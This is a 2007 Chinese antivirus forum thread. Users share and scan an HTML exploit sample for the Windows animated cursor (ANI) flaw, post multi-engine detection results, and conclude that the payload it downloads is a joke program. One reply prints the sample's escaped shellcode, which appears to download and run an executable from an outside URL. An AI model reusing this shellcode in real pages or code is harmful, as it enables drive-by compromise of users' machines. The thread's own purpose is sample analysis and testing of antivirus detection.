查看: 3094|回复: 15
收起左侧

[病毒样本] kv你够nb就给我把这网页杀了[md5:aab3f]

[复制链接]
mofunzone
发表于 2007-6-17 13:08:04 | 显示全部楼层 |阅读模式
星期四上报的kav和antivir,kav入库,antivir没来得及处理,估计等星期一了
File:           exploit.html
Status:        
INFECTED/MALWARE
MD5         aab3f9b3b0788e9ad5ef6caf3c51b283
Packers detected:        
-
Bit9 reports:         File not found
Scanner results
Scan taken on 17 Jun 2007 05:09:27 (GMT)
A-Squared        
Found nothing
AntiVir        
Found nothing
ArcaVir        
Found nothing
Avast        
Found nothing
AVG Antivirus        
Found nothing
BitDefender        
Found nothing
ClamAV        
Found nothing
Dr.Web        
Found nothing
F-Prot Antivirus        
Found nothing
F-Secure Anti-Virus        
Found Exploit.Win32.IMG-ANI.af
Fortinet        
Found nothing
Kaspersky Anti-Virus        
Found Exploit.Win32.IMG-ANI.af
NOD32        
Found nothing
Norman Virus Control        
Found nothing
Panda Antivirus        
Found nothing
Rising Antivirus        
Found nothing
VirusBuster        
Found nothing
VBA32        
Found nothing

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
scottxzt
发表于 2007-6-17 13:24:49 | 显示全部楼层
这也算是系统的HIPS吧。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
剑指七星
发表于 2007-6-17 13:26:16 | 显示全部楼层
已检测到: 恶意程序 Exploit.Win32.IMG-ANI.af        URL: http:/bbs.kafan.cn/attachment.php?aid=88422/exploit.html
kp2006
头像被屏蔽
发表于 2007-6-17 13:28:34 | 显示全部楼层
kv杀这一流水平
1688388728
发表于 2007-6-17 15:53:47 | 显示全部楼层
病毒: Exploit.Win32.IMG-ANI.af
文件: exploit[1].rar
目录: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZM0SZ5EQ
进程: GreenBrowser.exe
solcroft
发表于 2007-6-17 16:02:51 | 显示全部楼层
菜鸟提问:这一段要怎么unescape?unescape不是只有三个字节吗?

  1. %u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u2e00%u5c2e%u2e4c%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a%u622f%u6f6c%u2e67%u6968%u7073%u7361%u6365%u632e%u6d6f%u6c2f%u6261%u726f%u7461%u726f%u6f69%u722f%u6365%u7275%u6f73%u2f73%u6e61%u2f69%u6568%u7461%u652e%u6578%u0000
复制代码
icka
发表于 2007-6-17 17:05:16 | 显示全部楼层
htp://blog.hispasec.com/laboratorio/recursos/ani/heat.exe

原来以为
htp://blog.hispasec.com/laboratorio/recursos/ani/xrWqbcVOWnezXCS.YtVyFreutFltHSd 可能是个ANI病毒呢,可是里面好像没什么东西...


这个代码应该是最新的那个雅虎的攻击代码吧.
icka
发表于 2007-6-17 17:15:07 | 显示全部楼层
Antivirus Version Update Result
AhnLab-V3 2007.6.16.0 06.15.2007 Win-Joke/Melt.163927
AntiVir 7.4.0.32 06.16.2007  no virus found
Authentium 4.93.8 06.16.2007 is a joke program
Avast 4.7.997.0 06.16.2007  no virus found
AVG 7.5.0.467 06.17.2007  no virus found
BitDefender 7.2 06.17.2007 Application.Joke.Splash.A
CAT-QuickHeal 9.00 06.16.2007  no virus found
ClamAV devel-20070416 06.17.2007 Joke.Schmilz
DrWeb 4.33 06.16.2007  no virus found
eSafe 7.0.15.0 06.14.2007 Win32.Warezov.bt
eTrust-Vet 30.7.3721 06.15.2007  no virus found
Ewido 4.0 06.17.2007  no virus found
FileAdvisor 1 06.17.2007 Low threat detected
Fortinet 2.85.0.0 06.17.2007 Joke/Melt
F-Prot 4.3.2.48 06.15.2007 W32/Joke!aa2c
F-Secure 6.70.13030.0 06.15.2007  no virus found
Ikarus T3.1.1.8 06.17.2007 Win32.Joke.Melt
Kaspersky 4.0.2.24 06.17.2007  no virus found
McAfee 5054 06.15.2007 potentially unwanted program Joke-Splash
Microsoft 1.2607 06.16.2007 Joke:Win32/Rain
NOD32v2 2334 06.15.2007  no virus found
Norman 5.80.02 06.15.2007  no virus found
Panda 9.0.0.4 06.16.2007 Joke/Melt
Prevx1 V2 06.17.2007  no virus found
Sophos 4.18.0 06.12.2007 Joke/Schmilz
Sunbelt 2.2.907.0 06.16.2007 Joke Program
Symantec 10 06.17.2007 Joke Program
TheHacker 6.1.6.133 06.15.2007 Joke/Splash
VBA32 3.12.0.2 06.15.2007 Win32.Joke.Melt
VirusBuster 4.3.23:9 06.16.2007 Joke.Schmilz
Webwasher-Gateway 6.0.1 06.16.2007 Joke.Schmilz

不是病毒?


并且....上面报ANI难道不对?
solcroft
发表于 2007-6-17 17:16:53 | 显示全部楼层

回复 #8 icka 的帖子

开玩笑程序,不是病毒
挺好玩的

那个js你解密了吗?
mofunzone
 楼主| 发表于 2007-6-17 17:17:27 | 显示全部楼层
以后用jotti吧,vt的antivir不是正统

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\heat.rar'
C:\Documents and Settings\Administrator\My Documents\
  heat.rar
    [0] Archive type: RAR
    --> heat.exe
        [DETECTION] Contains signature of the joke program JOKE/Schmilz
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-8 10:16 , Processed in 0.133256 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表